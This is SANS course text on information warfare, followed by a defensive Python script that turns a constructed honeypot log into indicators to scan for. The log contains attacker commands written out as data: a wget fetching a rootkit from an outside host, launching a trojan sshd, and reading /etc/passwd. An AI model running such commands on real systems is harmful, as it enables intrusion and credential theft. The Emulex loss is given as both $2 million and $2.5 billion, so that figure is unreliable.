5 - 1
Information Assurance Foundations - SANS
©2001
1
Information Warfare
Security Essentials
The SANS Institute
"Warfare" can be broadly defined as "the waging of armed conflict against an enemy." In this
module we will consider what warfare means in the context of today's information systems and
networks. We will see that the fundamental principles of warfare known for thousands of years are
still relevant on today's new battleground.
5 - 2
Information Warfare - SANS
©2001
2
Agenda
• What is Information Warfare?
• Why is it Important?
• Offensive Tactics
• Introduction to Network Attacks
• Defensive Tactics
After introducing the concept of information warfare, we will be concentrating on warfare principles
and strategies. We will discuss both offensive and defensive tactics, both theory and practice. As a
concrete example of offensive tactics, a quick introduction to TCP/IP network attacks is provided.
What is Information Warfare?
Information warfare is the offensive and defensive use of information and information systems to
deny, exploit, corrupt, or destroy an adversary's information, information-based processes,
information systems, and computer-based networks while protecting one's own.
Such actions are designed to achieve advantages over military or business adversaries.
-Dr. Ivan Goldberg
We start our discussion with a definition of information warfare. The definition above simply maps
our intuitive definition of warfare (subvert the enemy while protecting ourselves) into the realm of
computers and networks. This definition has been provided by Dr. Ivan Goldberg, who leads the
"Institute for the Advanced Study of Information Warfare". The institute's website has a number of
white papers and reports on information warfare topics.
Eric Hrovat provides some interesting perspectives on information warfare in his paper, "Information
Warfare: The Unconventional Art in a Digital World" published by SANS:
Examples of Information Warfare
• A company breaking into a competitor’s
computer system to find out their list of
customers
• An R&D company putting false
information about research on their web
site to mislead the competition
• A foreign government stealing tapes
containing classified information
There are many possible forms of information warfare; the slide above provides three examples. Any
time someone uses information as a weapon against an adversary, that is information warfare. The
distinguishing factors are only how the information is obtained, how it is used, and to what effect.

We consider theft of information a form of information warfare, but the most critical issue is how the
stolen information is used against its rightful owner. In terms of the examples, a company that
discovers a list of its competitor's customers might send false or misleading information to the
customers, might market to these people specifically, or might simply see to it that the customers are
harassed by telemarketers and spam (so the recipients think that the company they trusted released
their information without permission).
A foreign government stealing classified backup tapes might be able to discover detailed technical
information concerning the capabilities of their adversary's weapons, or might obtain documents
detailing strategies, names of informants, or maps of secret testing facilities. The possibilities are
endless.
A startup tech company that has a next generation product to release might post information stating
that their product will not be ready for several months. Such a posting might lull the company's
competitors into a false sense of not needing to hurry their own development cycles. When the
startup releases its product months earlier than advertised, the competition is caught flat-footed.
Key Points From the Examples
• Information Warfare can be:
– Theft
– Deception
– Sabotage
• Does not have to be technical or
sophisticated
• Attackers will always go after the
weakest link
Abstracting the previous examples a level, we can list a few fundamental concepts. Theft,
espionage, blackmail, deception, sabotage, destruction -- these are all common goals in information
warfare attacks. As in other forms of warfare, a skilled attacker will seek out his opponent's
weaknesses and attack those first and most vigorously. For example, sometimes social engineering or
packet flooding attacks most effectively accomplish an attacker's goals, but neither of these attacks
requires any sophisticated technical skills.
Why is it Important?
• Affects all governments and companies,
and even individuals
• Can be devastating
• Risks are often not well understood
• Can be difficult to predict or detect
• Defenses must be custom tailored
• Raises questions of legalities and liabilities
In today's world, information warfare impacts everyone, whether they own a computer or not.
Consider identity theft, where one person is able to impersonate another, resulting in destroyed credit
histories, undeserved criminal records, misassigned debt and liability, false healthcare documents,
and more. Most people and organizations are not fully aware of the risks that surround them,
although the results of an attack can be devastating.
Because each organization is different, there is no "one size fits all" defense system. The only way to
design a good defense is to understand the offensive tactics used by attackers, and to understand the
defensive tactics and tools available to us. We will explore both offensive and defensive tactics in
this module, and see how (fortunately) a few basic principles can be applied across a large number of
situations. Interestingly, our most useful principles come not from information theory, but from a
compilation of warfare strategies written well over two thousand years ago: Sun Tzu's "Art of War".
These strategies are as relevant today as when they were first written.
How Dangerous is it Really?
A few facts from the Honeynet project concerning
break-ins between April and December 2000:
• Seven default Red Hat 6.2 servers were attacked
within 3 days of connecting to net
• Fastest time for any server to be compromised was
15 minutes from first connection to net
• Default Win98 box compromised in less than 24
hours from first connection, and compromised
another four times in the next three days
But let's back up a minute. Perhaps we are over-reacting. Is it really all that dangerous on the internet
today? Are there really that many "evil-doers" out to do me ill when I connect to the internet?
Unfortunately, yes. The Honeynet project (a group that sets up and monitors whole networks of
honeypots running many different operating systems) recently reported some statistics concerning the rate of
break-ins to their small network over a period of 9 months. The full information concerning the stats
above is quoted from the paper below.
----------------
• Between April and December 2000, seven default installations of Red Hat 6.2 servers were
attacked within three days of connecting to the internet. Based on this, we estimate the life
expectancy of a default installation of Red Hat 6.2 server to be less than 72 hours. The last time we
attempted to confirm this, the system was compromised in less than eight hours. The fastest time ever
for a system to be compromised was 15 minutes. This means the system was scanned, probed, and
exploited within 15 minutes of connecting to the internet. Coincidentally, this was the first honeypot
we ever setup, in March of 1999.
• A default Windows 98 desktop was installed on October 31, 2000, with sharing enabled, the same
configuration found in many homes and organizations. The honeypot was compromised in less than
twenty four hours. In the following three days it was successfully compromised another four times.
This makes a total of five successful attacks in less than four days.
----------------

These facts (and other information in the paper) demonstrate the hostility of today's networks even to
a simple home user. Even "grandma" needs to be aware of the dangers of the online environment
today. As an example, consider that many of us use home computers to fill out year-end income tax
forms. An attacker able to access that information would know enough to cause significant problems.
Today's networks are infested with worms and automated attack programs that relentlessly seek out
and compromise vulnerable computers, reporting back to a human only after accomplishing a
successful compromise. Companies and governments must be secured against these threats, as well
as against more sophisticated attackers specifically targeting their organization.
How Would you be Impacted?
• Consider the following scenario:
– You go into work tomorrow and all of your
computers are gone and there is no internet
connection.
• Could you handle the situation?
• Do you have backups? Uncontaminated
backups? Is there a restore process?
• Could your organization survive the loss?
Is your organization prepared for an attack, whether from the internet, a natural disaster, or a
terrorist act? Part of information warfare is planning for the worst and having a recovery plan in
place. Many of us would be in a lot of trouble if a particular building burned down, for example --
that building being the one holding the primary information and all of its backup copies. The
September 11th tragedy demonstrated how critical backups can be to a company's survival.
When we ask about "uncontaminated backups", does that make sense to you? Consider a virus that
spreads rapidly but remains undetected because it does not do anything observable. The virus infects
several computers, but because it is not detected the virus program is copied onto the backup tapes
along with legitimate information. Time passes. Ten months later the virus's payload goes into action
and starts destroying files and laying waste to operating systems. You think, no problem, I've got
backups going back 6 months. Oh no! All the backups are contaminated too! What do we do now?
Do you have insurance against information loss? A recent Information Week article (January 2,
2002) explains how many insurance providers have decided to exclude online assets and
terrorism-related damages from their IT policy offerings.
Threats
• Internal threats
– Employees
– Contractors
– Visitors
• External threats
– Anyone connected to the internet
The threat to a company could really be anything. Threats are typically broken down into internal
and external threats. Internal threats are attacks launched by employees, contractors, or even
visitors to your facility. External threats could really be anyone that is connected to the internet.
Threats can also range from intentional to unintentional events. Unintentional events, like floods or
fires, could also be a threat that impacts a company. Even though these threats are not meant to hurt
the company, the net result is the same. Therefore it is important to understand and react to all
possible threats that are posed to your company.
Offensive Tactics
• Using publicly available information maliciously
• Stealing confidential information
• Destroying or corrupting important data
• Denial of Service attacks against business or
livelihood
• Providing false information in order to deceive,
mislead, or confuse
• Impersonation and slandering
• Public embarrassment (e.g. website defacement)
Let us begin our consideration of information warfare concepts by looking at the offensive side of
the game. Defensive strategies will be covered later.
The slide above lists several common ways information can be involved in an attack against an
organization or individual. At first glance it may seem that these attack methods are specific to the
information age. In the next few slides we will take a closer look at several of the specific tactics and
show that the concepts behind them have been well-known to warriors for centuries.
Public but Sensitive Information
"It is always necessary to begin by finding out the names of
the attendants, the aides-de-camp, and door keepers and
sentries of the general in command." -Sun Tzu
• There are many sources of information
– Press releases
– Employment ads
– Company descriptions
– Public databases (whois, legal, edgar, healthcare,
whitepages)
Over two thousand years ago Sun Tzu noted that deploying spies to gather information such as the
names of people in the enemy organization, and the types of sentries (read defense mechanisms here)
is an important first step in warfare. Things haven't changed very much.
Given today's internet, it is possible for an attacker to find out a great deal about an adversary
without breaking any laws or even raising any eyebrows. If an attacker is interested in an individual
or a company, internet white page directories can provide names, addresses, phone numbers, street
maps, and even satellite photographs. Attackers can often gain access to legal, healthcare, and credit
history databases without too much trouble. A google.com search for an individual's email address
can provide links to newsgroup postings which contain information about the individual's interests,
habits, friends, employer, etc. Information-rich messages posted to security mailing lists such as "I
work for company XYZ and our main www.xyz.com IIS 5.0 web server has been hacked and is
backdoored..." can be very useful.
In addition, companies love giving out information to help fuel growth, but often fail to realize the
negative impact that information could have on the company. For example, an ISP that has just built a
new network wants to advertise it to help get additional business. So it issues a press release that
describes its new computers -- what brand, what operating systems, what versions, etc. An attacker
can easily use the information to build an attack list for breaking into the ISP's systems. Similarly, a
company that posts a list of employee names provides an attacker with information useful in
username/password guessing attacks.
Public databases can also provide a wealth of information. For example, publicly traded companies
are required to disclose certain information to the SEC. The SEC information is posted online in the
EDGAR database. These documents could be used to obtain the names of key executives, which
could be used in social engineering attacks.
Another common practice is for attackers to notice that a merger or acquisition has taken place, and
capitalize on the ensuing organizational confusion. For example, let's say our attacker's desired target
XYZ has recently acquired Acme Widgets Inc., and the two companies' technologies are being
integrated. Our attacker simply phones up an XYZ engineer (name obtained via the company
directory) and says that he is from Acme Widgets and that Executive So-And-So (name obtained
from EDGAR) wanted him to call to get the latest product specifications and development timelines.
Stealing Confidential Information
"Though the enemy be stronger in numbers, we may prevent
him from fighting. Scheme so as to discover his plans and
the likelihood of their success." -Sun Tzu
• Espionage is a real problem
• Many foreign governments have admitted to
launching corporate espionage attacks
against US companies to give their local
companies a competitive advantage.
A critical part of warfare, information or otherwise, lies in discovering the enemy's plans. Sun Tzu
notes that even a strong adversary can be crushed if his plans are known in advance. Online
espionage is the modern embodiment of this tactic, and it works as well today as ever.
One legal method of performing corporate intelligence gathering is to get the employees talking. A
recent news article describes how today's corporate spies rely heavily on forming online friendships
with target employees to gain information. According to one corporate intelligence professional, 85
percent of people will share sensitive information about themselves and their companies with perfect
strangers. The statistic is calculated based on the results of 78,000 recorded conversations with
people worldwide.
Further, companies have been known to hire agents to sit next to traveling executives on planes,
where they can read business information over the executive's shoulder, or engage in seemingly
innocent chit-chat. Experience has shown that executives are particularly vulnerable to questions
from brainless admirers.

And of course the true hack-in-and-steal-something method is wildly popular. For example, the
articles linked below describe an incident where attackers stole source code from Microsoft in
October of 2000. A Microsoft spokesperson called the incident "a deplorable act of industrial
espionage".
Interestingly, two of the main concerns in the Microsoft incident were that the attackers would
implant backdoors in the Windows source code (they had access to the data for three months), and
that the attackers would analyze the source code and discover vulnerabilities that no one else knows
about. Other concerns included the notion that a rival company might try to market the stolen
software as their own, or use the proprietary algorithmic and programming techniques to advance
their own products. These concerns illustrate a few of the dangers of proprietary information theft.
False Information
"All warfare is based on deception...The one who is skillful
maintains deceitful appearances, according to which the
enemy will act." -Sun Tzu
• If you know someone is watching you, why
not give them misleading information?
– False press releases
– False company information
– False server banners
This warfare tactic has the goal of misleading the enemy. The hope is that the enemy will use the
false information to influence their actions to our advantage. For example, a company might "leak"
the fact that they are going to submit a proposal for a particular job at the price of $5 million. The
competition, upon hearing this information, decides to bid $4.5 million. When the original company
actually bids $4 million (instead of the "leaked" $5 million figure) the spying competitor finds
themselves underbid.
As another example of misinformation in the information age, consider the case of an attacker who
fabricated a false press release that led to a publicly traded company temporarily losing more than $2
million in market value. The bogus press release was submitted via email to InternetWire and picked
up and distributed by a number of major news organizations. The press release stated that the
company in question (Emulex) was under investigation by the SEC, had revised its latest earnings
reports to show a loss instead of a profit, and was losing its CEO. The result was that investors
started to dump the company's stock en masse, sending Emulex's stock plummeting as much as 62%.
The company lost as much as $2.5 billion in market value before the fraud was discovered and
Nasdaq halted its trading.
In general, the misinformation strategy is quite interesting and complex. The complexities are the
same as with any other lie: how do you lie to some people while telling the truth to others, and keep it all
straight? An organization employing these methods can easily lose control of the story, or become liable for
damages resulting from the false statements. The techniques can nevertheless be quite effective.
Honeypots
"Learn the principle of the enemy's activity or inactivity.
Force him to reveal himself ... By holding out advantages
to him, cause him to approach of his own accord." -Sun Tzu
• Honeypots are sacrificial computers,
purposely left vulnerable.
• The computers are carefully instrumented
to record attackers' actions and gather
copies of the tools they use
Another example of deception in information warfare is the use of honeypots. The idea of a honeypot
is twofold.
First, as highlighted in the slide, honeypots can be used to gather intelligence about an attacker's
methods and goals. By leaving a few machines purposely vulnerable but instrumented, we can allow
attackers to break in and then watch what they do. By observing what files they look for we may be
able to guess what they are after, and by watching the tools they use we gain an idea of their
capabilities and methods of operation. For example, if the attacker exploits a MS SQL server
vulnerability to gain access, we would want to be sure to patch that vulnerability on all relevant
systems across the enterprise. Further, if we notice that the attacker likes to set up a Trojan SSH
server on port 50000/tcp, we might want to scan the internal networks for port 50000 listeners.
Second, honeypots can provide a way of diverting an attacker’s attention away from critical systems
for long enough to strengthen the defense. An attacker is likely to go after the "low hanging fruit",
that is, the easily compromised hosts on an enterprise, before moving on to more difficult targets. By
letting the attacker have a few sacrificial machines, we buy some time to learn about the attacker's
capabilities and react appropriately. Of course, Sun Tzu has a quote for this aspect of the strategy
too: "Sacrifice something, that the enemy may snatch at it."
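The following Python script is an added example, not part of the SANS module, showing how the honeypot intelligence described above is turned into a defensive check: it extracts the listeners an attacker set up (such as the Trojan SSH server on tcp/50000) and the files they looked for from a honeypot session log, then matches those ports against an inventory of what internal hosts are listening on. The log format, every IP address and the internal inventory are constructed for the example.

```python
import re
from collections import defaultdict

# Constructed honeypot session log (not real data): each line is
# "<timestamp> <attacker_ip> <event>" as an instrumented honeypot might record it.
HONEYPOT_LOG = """\
2001-06-02T03:14:07 203.0.113.45 exec: wget http://198.51.100.9/tools/rk.tgz
2001-06-02T03:14:22 203.0.113.45 exec: tar xzf rk.tgz
2001-06-02T03:15:01 203.0.113.45 exec: ./sshd_trojan -p 50000
2001-06-02T03:15:02 203.0.113.45 listen: tcp/50000 pid=4412 comm=sshd_trojan
2001-06-02T03:16:40 203.0.113.45 exec: cat /etc/passwd
2001-06-02T03:16:55 203.0.113.45 exec: find / -name '*.doc'
2001-06-03T11:02:10 198.51.100.77 listen: tcp/31337 pid=5120 comm=bd
"""

# A new listening socket opened by the attacker: the port and the program name.
LISTEN_RE = re.compile(r"listen: tcp/(\d+) pid=\d+ comm=(\S+)")
# Commands that reveal what the attacker is looking for on the box.
FILE_RE = re.compile(r"exec: (?:cat|find|grep|less) (.+)")


def extract_indicators(log_text):
    """Return ({port: tool_name}, [what the attacker searched for]) from a honeypot log.

    The ports tell us what to scan the rest of the network for; the file
    searches hint at what the attacker is after.
    """
    listeners = {}
    files_sought = []
    for line in log_text.splitlines():
        m = LISTEN_RE.search(line)
        if m:
            listeners[int(m.group(1))] = m.group(2)
            continue
        m = FILE_RE.search(line)
        if m:
            files_sought.append(m.group(1))
    return listeners, files_sought


# Constructed inventory of open TCP ports per internal host, e.g. the output
# of a periodic scan of the enterprise network (hypothetical addresses).
INTERNAL_LISTENERS = {
    "10.0.1.10": {22, 80, 443},
    "10.0.1.23": {22, 50000},
    "10.0.2.5": {25, 31337},
    "10.0.2.9": {22},
}


def hosts_matching_indicators(listeners, inventory):
    """Map each suspect port learned from the honeypot to the internal hosts listening on it."""
    hits = defaultdict(list)
    for host, ports in sorted(inventory.items()):
        for port in sorted(ports & set(listeners)):
            hits[port].append(host)
    return dict(hits)


if __name__ == "__main__":
    listeners, files_sought = extract_indicators(HONEYPOT_LOG)
    print("Attacker listeners:", listeners)
    print("Files sought:", files_sought)
    for port, hosts in hosts_matching_indicators(listeners, INTERNAL_LISTENERS).items():
        print(f"tcp/{port} ({listeners[port]}) also open on: {', '.join(hosts)}")
```

Hosts reported by the script are candidates for investigation, not proof of compromise: a legitimate service may happen to use the same port, so the next step is to identify the process behind the listener.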
Denial of Service Attacks
"So in war, the way is to avoid what is strong and
strike at what is weak." -Sun Tzu
• Easy to wage
• Difficult to defend against
• Can result in lost revenue
• Can hurt public image
Most of us remember the infamous Distributed Denial of Service (DDoS) attacks waged by a
Canadian teenager in February of 2000 resulting in an estimated total loss of $1.7 billion to several
US companies. The attacker, known as "Mafiaboy," flooded the web servers of eBay, Dell, Amazon,
and Yahoo (among others) with meaningless traffic in order to overload the target networks and
prevent the servers from responding to legitimate requests. Because each of the targeted
organizations relies heavily on its internet presence as a source of revenue, Mafiaboy's Denial of
Service attack was quite damaging.
A news article on the topic:
The important thing to take away from the example is that Mafiaboy didn't need any sophisticated
technical skills to wage these attacks. In fact, the tools he used and others like them are publicly
available on many websites. These tools do not take any special skills to run.
On the other hand, the sites that were attacked all employ heavy security and would be difficult to
break into. Mafiaboy employed Sun Tzu's concept of avoiding what is strong (the site's security
defenses) and striking at what is weak (fundamental behavior of IP networks). Most Denial of
Service attacks are simple to wage, but difficult to defend against. Why not take the easy route to
inflicting damage on an enemy? Part of defensive information warfare comes in identifying our own
weaknesses and strengthening our defenses accordingly.
Understand the Risks
"He who exercises no forethought but makes light of his
opponent is sure to be captured by them." -Sun Tzu
• Attackers have a complete arsenal of
weapons to use against a network's
defenses
• An understanding of an attacker's offensive
warfare tactics is essential
The point of intersection between offense and defense comes in understanding the offensive in order
to better defend. In information warfare, this concept is very important. It has been estimated that
new vulnerabilities were being discovered at the rate of 200 per month by mid 2001.
A recent CERT report provides the following figures concerning numbers of reported vulnerabilities
for the past three years:
1999: 417 vulnerabilities
2000: 1090 vulnerabilities
2001: 2437 vulnerabilities
CERT further reports that the number of incidents has doubled between 2000 and 2001. 21,756
incidents were reported in 2000, while 52,658 incidents were reported in 2001. Less than 10,000
incidents were reported in 1999.
Clearly it is important to keep up with information on new vulnerabilities, patches, and exploits. It is
also important to understand the fundamental techniques employed by attackers (e.g. buffer
overflows, improperly formatted packets, weak password exploitation, etc.) so that we can spot
vulnerabilities ourselves before an attacker finds them. The administrator who believes that "it
couldn't happen to them" is sure to be in for a rough ride.